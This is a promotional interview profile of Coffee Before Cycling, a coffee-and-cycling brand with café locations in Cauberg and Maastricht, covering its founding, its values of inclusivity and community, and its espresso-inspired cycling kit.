Coffee Before Cycling isn’t just a brand; it’s a lifestyle that fuses the love of coffee and cycling in an inclusive community. Founded by Brian Megens and Shivani Achrekar, this project began with the opening of Fixed Gear Coffee in 2018 and has since expanded to two locations in the Netherlands. Their mission is to create a welcoming space for everyone, from coffee lovers to World Tour professional cyclists, where they can enjoy a good cup of coffee, a bit of cycling culture, and events.

How did your team/project come about?

Fixed Gear Coffee, the physical location where Coffee Before Cycling was born, opened its doors in 2018 in Cauberg with the goal of combining the best of cycling and coffee. In 2020, we expanded our business with a second location in Maastricht. We envisioned a space where everyone, regardless of cycling level, could come together. We wanted to create a place where people could enjoy excellent coffee, homemade cakes, admire bicycle collections, and participate in cycling-related events.

What are the values ​​and mission of your team/project?

Coffee Before Cycling’s core values ​​are inclusivity, community, and quality. Coffee Before Cycling believes in creating an inclusive environment where everyone feels welcome, regardless of their cycling experience, ethnicity, or background. Their mission is to inspire and connect people through a shared love of coffee and cycling. This philosophy is also reflected in their products, ensuring that every cup of coffee and every piece of clothing is of the highest quality.

How do you plan to influence the cycling community?

Coffee Before Cycling influences the cycling community by fostering a culture of inclusivity and connection. We organize rides and events that bring together cyclists of all levels, fostering a sense of community and shared passion. By creating a space where cyclists can meet, enjoy a coffee, and immerse themselves in cycling culture, we help build a vibrant and supportive community. Our collaborations with like-minded creatives and brands further amplify our impact, making cycling more accessible and enjoyable for everyone.

What was the inspiration behind your kit’s design? Is there a particular story behind it?

The Coffee Before Cycling kit is a testament to our commitment to quality and style. The kit features unique color combinations that reflect our dynamic and vibrant spirit. The design process was heavily influenced by our past experiences and the desire to create a kit that stands out.

For our kit, we opted for an earthy color palette, inspired by the rich hues of freshly brewed espresso, with the intention of evoking the sensory experience of coffee and cycling. This approach ensures that the kit not only has a captivating aesthetic, but also reflects our community’s passion for coffee and cycling.

Coffee Before Cycling is a unique project that successfully combines the worlds of coffee and cycling in a cohesive and inclusive community. Through high-quality products, welcoming spaces, and engaging events, it continues to inspire and connect people.
